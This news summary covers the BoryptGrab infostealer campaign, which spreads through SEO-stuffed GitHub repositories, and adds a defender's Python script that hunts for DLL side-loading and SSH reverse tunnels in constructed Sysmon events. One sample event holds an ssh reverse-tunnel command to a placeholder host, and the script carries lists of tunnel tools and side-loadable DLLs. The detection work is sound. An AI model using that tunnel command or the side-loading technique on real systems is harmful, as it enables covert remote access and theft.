Trend Micro discovered a campaign utilizing more than 100 GitHub repositories to distribute the BoryptGrab information stealer. This malware targets a wide range of sensitive data, including browser credentials, cryptocurrency wallets, system information, and personal files, often deploying a reverse SSH tunnel for persistent attacker access.
The threat actors behind BoryptGrab trade on GitHub's reputation to host malicious ZIP archives disguised as legitimate software tools, utilities, and video game cheats. By stuffing repository README files with search-engine keywords, the attackers push their repositories up the results for those terms, so victims arrive by searching rather than by being phished. One documented example is a deceptive Voicemod Pro page that sends users through a series of encoded redirect URLs before delivering the payload.
Upon execution, the malware typically relies on DLL side-loading: a legitimate executable shipped in the archive loads a malicious library file placed alongside it, so the attacker's code runs inside a trusted (often signed) process and evades controls keyed to the reputation of the program being launched. The library then decrypts and launches the primary payload. Some variants go a step further by installing a secondary backdoor known as TunnesshClient, which establishes a covert communication channel so the attackers can maintain control over the compromised system.
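As an added illustration of how a defender might hunt for the two behaviours described above (this is example code written for this page, not code from Trend Micro's report or from the malware), the following Python script runs two checks over a handful of constructed Sysmon-style events (Event ID 7 image-load and Event ID 1 process-create records, represented as Python dicts): a DLL whose name normally resolves from System32 but was loaded, unsigned, from the launching executable's own directory; and an ssh.exe or plink.exe launch carrying a remote port forward (`-R`), the shape a reverse SSH tunnel takes on the endpoint. The directory paths, the "VoicemodPro" folder name, the short DLL-name list and every event's contents are assumptions made up for the example.

```python
from pathlib import PureWindowsPath

# Illustrative subset of DLL names that a legitimate EXE will resolve from its own
# directory before System32, making them classic side-loading targets (assumption:
# a real hunt would use a much longer, curated list).
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll", "userenv.dll"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
TUNNEL_BINARIES = {"ssh.exe", "plink.exe"}

# Constructed Sysmon-style events, not real telemetry from the campaign.
# EventID 7 = image (DLL) loaded, EventID 1 = process created.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\victim\Downloads\VoicemodPro\setup.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": r"C:\Users\victim\Downloads\VoicemodPro\setup.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\VoicemodPro\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 1, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": r"ssh.exe -N -R 2222:127.0.0.1:22 -i C:\ProgramData\k tunnel@203.0.113.10",
     "ParentImage": r"C:\Users\victim\Downloads\VoicemodPro\setup.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def sideload_reason(ev):
    """Return a reason string if an image-load event looks like DLL side-loading, else None."""
    if ev.get("EventID") != 7:
        return None
    image = PureWindowsPath(ev["Image"])
    dll = PureWindowsPath(ev["ImageLoaded"])
    dll_dir = str(dll.parent).lower()
    if dll_dir.startswith(SYSTEM_DIRS):
        return None  # loaded from where it belongs; nothing to see
    reasons = []
    if dll.name.lower() in SYSTEM_DLL_NAMES:
        reasons.append("system DLL name resolved outside System32")
    if dll_dir == str(image.parent).lower():
        reasons.append("DLL loaded from the executable's own directory")
    if ev.get("Signed", "").lower() != "true":
        reasons.append("unsigned DLL")
    # Require the name collision plus at least one more indicator to keep noise down.
    if "system DLL name resolved outside System32" in reasons and len(reasons) >= 2:
        return "; ".join(reasons)
    return None


def reverse_tunnel_reason(ev):
    """Return a reason string if a process-create event starts an SSH remote port forward."""
    if ev.get("EventID") != 1:
        return None
    name = PureWindowsPath(ev["Image"]).name.lower()
    if name not in TUNNEL_BINARIES:
        return None
    tokens = ev.get("CommandLine", "").split()
    # Match a bare "-R" or "-R<port>..." (both ssh and plink accept the forward this way).
    if any(t == "-R" or (t.startswith("-R") and t[2:3].isdigit()) for t in tokens):
        parent = PureWindowsPath(ev.get("ParentImage", "")).name or "unknown parent"
        return f"{name} started with remote port forward (-R) by {parent}"
    return None


def scan(events):
    """Run both checks and return (event index, image path, reason) for every hit."""
    findings = []
    for i, ev in enumerate(events):
        for reason in (sideload_reason(ev), reverse_tunnel_reason(ev)):
            if reason:
                findings.append((i, ev["Image"], reason))
    return findings


if __name__ == "__main__":
    for idx, image, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {image}: {reason}")
```

On the constructed input the scan flags event 1 (version.dll loaded unsigned from the setup.exe directory) and event 2 (ssh.exe launched with `-R` by that same setup.exe), and leaves the benign kernel32.dll load and the notepad launch alone. The parent-process field in the tunnel finding is the pivot a responder would follow back to the archive that was run.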
Technical analysis of the infection chain showed a distribution network in which numerous repositories share the same underlying logic and tracking mechanisms. The researchers noted that many of the ZIP file names explicitly target users searching for cracked software or gaming enhancements. This high-volume approach keeps the campaign resilient even when individual repositories are flagged and removed by platform moderators.
Evidence gathered from the campaign’s infrastructure and the presence of Russian-language comments within the source code suggest the threat actors may be of Russian origin. The malware is capable of exfiltrating data to remote servers while simultaneously monitoring the victim’s activity. As the campaign continues to evolve, the reuse of specific delivery patterns highlights a calculated effort to exploit public trust in open-source hosting platforms.
Source: Massive GitHub Malware Campaign Spreads BoryptGrab Password-Stealing Malware